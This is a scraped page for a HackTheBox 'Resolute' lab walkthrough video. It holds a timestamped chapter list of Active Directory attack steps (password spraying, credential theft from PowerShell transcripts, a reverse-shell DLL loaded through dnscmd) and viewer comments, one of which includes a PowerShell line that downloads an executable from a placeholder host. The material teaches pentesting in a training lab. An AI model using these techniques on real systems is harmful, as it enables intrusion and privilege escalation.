HackTheBox - Resolute
Рет қаралды 41,161
Күн бұрын00:00 - Intro
01:08 - Talking about my switch to Parrot
02:00 - Begin of nmap, discovering it is likely a Windows Domain Controller
04:30 - Checking if there are any open file shares
06:11 - Using RPCClient to enumerate domain users (enumdomusers)
07:55 - Using CrackMapExec to dump the PasswordPolicy
08:45 - Using RPCClient to dump Active Directory information (querydispinfo)
10:45 - Bruteforcing accounts via CrackMapExec with password of Welcome123!
14:30 - Using Evil-WinRM to remote into the server as Melanie
15:40 - Building the latest version of Seatbelt on CommandoVM (The DotNet version is incompatible)
17:40 - Explaining some cool bash one line tricks, then linking Egypt's "One liners to rule them all" talk
24:40 - Changing Seatbelt to compile to Version 4.0 then trying again.
26:30 - Finally examining the Seatbelt output, see the PSTranscript Directory and a Custom group in DNSAdmins
29:50 - Using RPCClient to Enumerate members of the Contractors group (enumdomgroups/querygroupmem)
35:30 - Running WinPEAS to compare the differences
38:30 - Exploring hidden directories to see PSTranscripts, then finding credentials in a powershell log
44:20 - Using Evil-WinRM with the password from a PSTranscript File to get shell as Ryan
45:40 - Quickly going over how to execute code on a Domain Controller as a DNS Admin
46:10 - Using MSFVenom to create a Reverse Shell DLL (we'll do this better at end of the video)
49:10 - Using DNSCMD to have the DNS Server execute our MSFVenom created DLL from a SMB Network Path... Works but hangs the DNS Server
52:50 - Using the DNS-EXE-Persistance to help us create a better to do the Reverse Shell
53:03 - Explaining the DNSCMD Exploit path on how it can be used both foor lateral movement and privesc
54:50 - Start of creating the DLL to use with this DNS Exploit
56:45 - Grabbing a C++ Reverse Shell program from github to add to our DNS Exploit Project, then modify it to execute as a thread
01:02:20 - Showing that we get a Reverse shell and DNS Keeps running
01:03:52 - Removing the "CreateThread" portion of our code to show that was needed, without CreateThread the DNS Server hangs because it stops on the RevShell code
@IND_Abhi 4 жыл бұрын
that new feature is awesome on the timeline
@terror403 4 жыл бұрын
I fear that this feature is a premise to a new censor
@ShinigamiAnger 4 жыл бұрын
ItsMe why? That thing is generated if there are time stamps in the video description, so it is just great if the video creator care enough to write them down. Having the little spaces on the timeline is a consequence of that, and kinda irrelevant tbh.
@ItsMeooooooo 4 жыл бұрын
@@ShinigamiAnger I don't get your Point. This feature is seen on pornhub for months now
@ShinigamiAnger 3 жыл бұрын
@@ItsMeooooooo and so what?
@r0kithax 4 жыл бұрын
Really glad you covered some opsec topics like safe dll injection and benefits of remotely enumerating active directory which I didn't cover in my video. Keep up the good work, we're all looking forward to your next video! :D
@KrizyzZ00 4 жыл бұрын
We learn so much from each video u make Thank you for being such a good teacher and mentor I'm watching your videos for a year and half now and always surprised on how much detailed your videos are..
@azelbane87 4 жыл бұрын
MAJESTIC walkthrough as usual!! also nice to see YOU using ParrotOs!! BRAVISSIMO!!!
@GabrielGutierrez 4 жыл бұрын
First two minutes of video I already said WOW, as always great work “Master”.
@CaptainMarmoo 4 жыл бұрын
im glad you decided to use parrot, i know you where thinking about it a few days ago from twitter so its good to see this
@feiwoza 4 жыл бұрын
oh Twitter ..i need to look for tbe handle :) thanks
@MooseC00kie Жыл бұрын
LOVE your teaching/educational skills 👌
@ichigok2594 4 жыл бұрын
Thanks. I learn lot of tricks from your video. Really appreciate the knowledge you share. 🙏
@mr.fakeman4718 4 жыл бұрын
3:30 I've just heard that /etc/hosts thing being covered here. Wow, I'm surprised!:0 I don't know who didn't know this already, but at least this got covered too.
@tchqtch1273 4 жыл бұрын
Thank you for this great video, but when you used the winrm command should be a specific port to connect to?
@juliusgrybauskas816 4 жыл бұрын
you fkng genius dude... god bless you for your kindness
@DHIRAL2908 4 жыл бұрын
Please tell us the customizations you did! I use parrot but I really want the theme HTB's Pwnbox uses!
@jrodhd 3 жыл бұрын
This would be very nice!
@raj77in 4 жыл бұрын
As usual good video. For the awk command you can use '[\[\]]' as seperator.
@ippsec 4 жыл бұрын
I had tried that, didn’t seem to work as expected. So just did it one at a time.
@raj77in 4 жыл бұрын
@@ippsec with latest version of awk in Fedora which is "GNU Awk 5.0.1, API: 3.0 ", this version works - "cat /tmp/users |awk -F'[][]' '{print $2}'"
@Reelix 4 жыл бұрын
Hey Ipp! When doing a - p - in nmap, try include a - - min-rate=5000 if you don't mind a noisy scan. It will make your - p - scan significantly faster (Minutes to seconds) :) Edit: Added spaces to bypass KZfaq formatting
@wildwanderer5650 4 жыл бұрын
some times it may not give u an accurate scan...thats why we dont normally use the --min-rate and the --max-retries.....even thou we get significant amount of time difference with them we'll be missing some ports which needs time to retransmission...you know our scan wouldnt pickup all the result when it shows that it hit the retransmission cap...try it on ur own to check it...if ur in HTB do this with blue / optimum...and do an normal scan with it too...and compare the results...
@westernvibes1267 4 жыл бұрын
I switched to parrot kde from kali last week and it's just way more beautiful than kali and easier to work with.
@Tarexant 4 жыл бұрын
@IppSec are you going to just use a notes file from hereon in or are you going to use CherryTree again? CherryTree was nice.
@LoayMatar 4 жыл бұрын
You've mentioned Powershell quiet a bit, can you do in-depth videos about Powershell?
@pdyli 8 ай бұрын
❤❤❤❤
@harshmodi5901 4 жыл бұрын
My Kali crashed as well!!!! You can use sublime text and create a md file for notes
@FreezeLuiz 4 жыл бұрын
The PS command throwed an exception because, I think you need to specify the absolute path to the output file (new-object net.webclient).downloadfile("ip/exe","c:\bla\bla\file.exe")
@vladimirjanout6951 3 жыл бұрын
1:51 May I ask you how did you managed to take the customization of HTB Parrot OS into your own machine?
@de_pack_ 4 жыл бұрын
At 07:28, when operator > is used, the file is truncated and hence there is nothing to operate on. Thus the blank file. I ended up losing a source file once doing this and it was a painful lesson.
@m.abbasansari2664 4 жыл бұрын
yeet this is awesome
@teststudent5032 3 жыл бұрын
Great video as usual ippsec! I worked on the dll and it looks like that when we exit from the shell the dns server crashes. Would you please check? used the code you used.
@kumars9012 4 жыл бұрын
Your videos are good , it would be helpful if you could mention whar you are looking at and why you execute the command, it would be helpful for beginners like me
@utku_yucel 4 жыл бұрын
Thanks!
@Rose-ng2zp 4 жыл бұрын
How do you export customization from pwnbox to a local install of parrot OS?
@pwndumb2903 4 жыл бұрын
Hi. Great video.
@gabriyel2193 4 жыл бұрын
te conheço de algum lugar ...
@muhammadhafeez5491 4 жыл бұрын
Can you please tell us how you configure your terminal?
@ltfranz4747 4 жыл бұрын
Getting Native Command Failed when I tried to run Seatbelt.exe, any suggestions?
@rustyshackles9563 4 жыл бұрын
Crackmapexec doesn’t give me any of that info do I need to install anything else to get it to work
@timrustle6114 Жыл бұрын
Wow I was stuck on how to get to ryan a while, somehow my winPEAS didn't show the transcript directory, how can that be?!
@adampetersen1300 7 ай бұрын
Hello, quiestion for you - I noticed you didnt have any issues running seatbelt but i keep getting picked up by the AV. tried using some AMSI bypass, what version of Seatbelt were you using? I am compiling locally w/ .net 4.0
@ippsec 7 ай бұрын
I am not positive this video is pretty old, I would try removing the help output and such and trying again. Also make sure you aren’t compiling in debug mode
@adampetersen1300 7 ай бұрын
@@ippsec 🤘great thanks for the tips!
@michaeljay2110 4 жыл бұрын
how did you get the pwnbox theme?
@moeaj1536 3 жыл бұрын
can you make a video about powershell commands? ...that will be great dud ....
@elikelik3574 4 жыл бұрын
I worder how can a human being know so much things? =D I'd like to know how do you learn so many different topics, maybe you can share with us your learning style. Yeah we know, you already sharing a much valuable knowledge with us, and we are thankful to you.By the way here 55:41 it is german(PS: I am not german just know that language ).Take care of yourself. Peace
@ilyarik8888 4 жыл бұрын
IppSec, why do you use vpn on your Kali machine if you've not been doing anything malicious, only researching purposes? Is there a reason you don't want to let any traffic out from your VM? Do you use openvpn only on your virtual machine or on the host as well? What vpn servers do you recommend to use and for what cost? Point out if there are the answers in one of your videos already, I didn't find that. And what software do you prefer for virtualizing your working machines? Thank you, I'm a beginning security researcher.
@ippsec 4 жыл бұрын
The VPN puts you on HackTheBox's network, which is the only way these machines can be accessed. Additionally, VPN or TOR != illegal activity. There are plenty of legitimate use cases for either. If I am on public WiFi, I'll use a VPN to ensure no one is intercepting my traffic.
@ilyarik8888 4 жыл бұрын
Ok, this is a part of HTB's infra, I see. And what vpn service would you recommend? I'm not sure what site I should trust all my network activity. I'm afraid of my vpn being used against me.
@ippsec 4 жыл бұрын
Any reputable VPN should be fine. Don’t do illegal things and a lot of those concerns go away.
@ilyarik8888 4 жыл бұрын
I don't, ama on the light side. Thank you, next stream there will be a donation from me :)
@zatoidarkchi 2 жыл бұрын
Hey when I try 'sc.exe stop dns' it says Access is denied?? Any ideas
@vasusethia554 4 жыл бұрын
why rpcclient was able to authenticate NULL session while smbclient failed to do so ?
@Stefan-we9up 4 жыл бұрын
rpcclient uses rcp protol, and smbclient uses smb. Those are 2 different things
@briansullivan8334 3 жыл бұрын
I know it's been a little over 4 months and you've probably been busy, but is there any chance you can upload your terminal settings finally? To either GitHub or even Pastebin?
@ippsec 3 жыл бұрын
Someone else has done it. I primarily just don't want people coming to me when things break. github.com/theGuildHall/pwnbox
@briansullivan8334 3 жыл бұрын
@@ippsec Understandable. Thank you very much for the link, sir. Have a great day and stay safe!
@itzcloudy09 Жыл бұрын
@@briansullivan8334 did you manage to customize your terminal like that
@ggnova8581 4 жыл бұрын
Do vulnhub boxes also
@okiplays8639 3 жыл бұрын
doing this box with ippsecs walkthrough and used below to extract username thats in brackets awk -F'[][]' '{print $2}' users.txt
@DebeMechero 4 жыл бұрын
21:33 next time, try with NET USE * /DELETE on cmd
@viraat_maurya 4 жыл бұрын
65535 Ports :)
@coverterror 4 жыл бұрын
There has to be easier way to do the DLL thread
@ippsec 4 жыл бұрын
As far as programming goes that is pretty easy; just need to know the language
@Ms.Robot. 4 жыл бұрын
Your wife must be the luckiest woman She gets htb previews anytime. 💗
@AndresMolinaR 4 жыл бұрын
crackmapexec -pass-pol gave me nothing, I don’t understand why, is this why you don’t like Kali anymore?
@ichigok2594 4 жыл бұрын
Andres Molina I had same issue. It’s not showing pwned and also smbmap -d domain -u user -p password -H host says authentication failure.
@ippsec 4 жыл бұрын
It’s very picky with order of arguments and if you have it wrong it doesn’t tell you, just displays nothing. Also could be the impacket version
@AndresMolinaR 4 жыл бұрын
IppSec You’re the Man, after installing and uninstall nothing worked, I even tried Parrot, however, I’ve just upgraded impacket and it worked just like you said, appreciate it! Thanks again.
@ltfranz4747 4 жыл бұрын
yeah my crackemapexec is version 5.0.2 for me and I'm still getting no response for --pass-pol. on fresh install Parrot Security btw
@huladoll272 3 жыл бұрын
Adding -u '' -p '' to the command worked for me.
@milanjovic4663 4 жыл бұрын
Back to Kali!!!
@zedrobot5864 4 жыл бұрын
Plz go back to Kali
@ippsec 4 жыл бұрын
You didn’t give any reasons why.
@zedrobot5864 4 жыл бұрын
@@ippsec old habits die hard 😎😁
@buestrm2841 4 жыл бұрын
@@zedrobot5864 😂
@SyN4pS62 3 жыл бұрын
Just for the record, the compilation errors you had, were just because of the "#include "stdafx.h"" that was located at the bottom of the list of the includes... for some reason, it just cannot be. hope this helps :)
@JuanBotes 4 жыл бұрын
Thanks!